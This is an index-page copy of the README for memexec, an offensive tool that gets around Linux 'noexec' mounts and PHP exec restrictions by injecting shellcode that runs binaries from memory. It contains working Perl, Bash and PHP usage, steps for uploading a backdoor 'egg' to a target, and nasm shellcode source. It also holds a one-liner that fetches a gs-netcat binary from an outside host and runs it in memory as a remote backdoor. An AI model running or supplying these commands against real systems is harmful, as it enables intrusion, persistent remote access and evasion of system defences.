Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/hackerschoice/memexec
Circumventing "noexec" mount flag to execute arbitrary linux binaries by ptrace-less process injection
https://github.com/hackerschoice/memexec
Last synced: 3 days ago
JSON representation
Circumventing "noexec" mount flag to execute arbitrary linux binaries by ptrace-less process injection
- Host: GitHub
- URL: https://github.com/hackerschoice/memexec
- Owner: hackerschoice
- Created: 2024-09-26T11:18:11.000Z (about 2 months ago)
- Default Branch: main
- Last Pushed: 2024-09-26T21:34:03.000Z (about 2 months ago)
- Last Synced: 2024-10-09T10:08:01.886Z (about 1 month ago)
- Language: PHP
- Size: 20.5 KB
- Stars: 8
- Watchers: 1
- Forks: 2
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
## Circumvent the `noexec` mount flag on Linux and execute abritrary binaries
This if useful on a Linux system when all writeable locations are mounted with `-o noexec` (including /dev/shm) or to escape PHP's 'exec' restrictions.
Use _one_ of the 3 scripts (perl, bash, php):
- The binary does not need to have +x
- The binary can reside on a noexec-partition
- Mostly the binary can be piped directly from the Internet into the memory (and executed there)
- Works as non-root user
- The PHP variant also circumvents PHP's "exec" restrictions.
- It injects shellcode into the running process and calls [memfd_create(2)](https://man7.org/linux/man-pages/man2/memfd_create.2.html) and [execveat(2)](https://man7.org/linux/man-pages/man2/execveat.2.html) to load a binary from a noexec-partition (or directly from the Internet).
- BASH and PHP do not support SYSCALLS. We advanced an old trick.Read the [circumventing the noexec Article](https://iq.thc.org/bypassing-noexec-and-executing-arbitrary-binaries) for more....
`TIME_STYLE` and `-lah` are used as an example to pass through environment parameters and command line options.
### PERL example:
```sh
source memexec-perl.sh
cat /bin/ls | TIME_STYLE=+%s memexec -lah
```
This was golfed by the fine people on Mastodon ([@acut3hack](https://@[email protected]), [@addision](https://@[email protected]), [@ilv](https://@[email protected]))### BASH example (by [@messede-degod](https://github.com/messede-degod)):
```sh
source memexec-bash.sh
cat /bin/ls | TIME_STYLE=+%s memexec -- -lah
```### The PHP variant also circumvents ["shell_exec" restrictions](https://www.cyberciti.biz/faq/linux-unix-apache-lighttpd-phpini-disable-functions/).
1. Upload `memexec.php` and `egg` (your backdoor) onto the target
2. Call `curl -SsfL https://target/memexec.php` to execute `egg` and bypassing noexec restrictions(This is my way of saying "hey. how are to?" to my old [team-teso](https://en.wikipedia.org/wiki/TESO_(Austrian_hacker_group)) colleague and long time PHP developer [@i0nic](https://x.com/i0n1c))
---
The educated reader understands that this is mostly used to pipe a backdoor from the Internet directly into memory, even when execution is prohobited by `noexec` or there is no writeable directory:
```shell
curl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-x86_64 | GS_ARGS="-ilD -s ChangeMe" perl '-efor(319,279){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}X,@ARGV' -- "$@"
```
---For the addicts, here is the nasm of the shellcode (memfd_create, copy loop & execveat):
```nasm
; nasm -felf64 memexec.nasm && ld memexec.o && ./a.outglobal _start
section .text_start:
push 0x00676765 ; "egg"
mov rax, 0x13f
mov rdi, rsp ; arg 1: name [egg]
xor rsi, rsi ; arg 2: 0 = no MFD_CLOEXEC
syscall
mov r8, raxmov rax, 2
mov rdi, rsp ; arg 1: name [egg]
xor rsi, rsi ; arg 2: 0 = O_RDONLY
syscall
mov r9, raxloop:
sub rsp, 0x400
xor rax, rax ; arg 0: read_NR
mov rdi, r9 ; arg 1: FD [egg]
mov rsi, rsp ; arg 2: buffer
mov edx, 0x400 ; arg 3: length
syscallcmp rax, 0x00
jle done ; EOFmov rdx, rax ; arg 3: length (from read())
mov eax, 0x01 ; arg 0: write_NR
mov rdi, r8 ; arg 1: FD [memfd]
syscall
jmp loop
done:mov rax, 322 ; arg 0: execveat_NR
mov rdi, r8 ; arg 1: memfd
push 0x00 ; an empty string
mov rsi, rsp ; arg 2: path (empty string)
mov rdx, rsp ; arg 3: ARGV points to empty string
xor rcx, rcx ; arg 4: ENV
mov r8, 0x1000 ; arg 5: AT_EMPTY_PATH
xor r9, r9 ; arg 6: must be clean
xor r10, r10 ; arg 7: must be clean
syscallmov rax, 60
xor rdi, rdi
syscall
```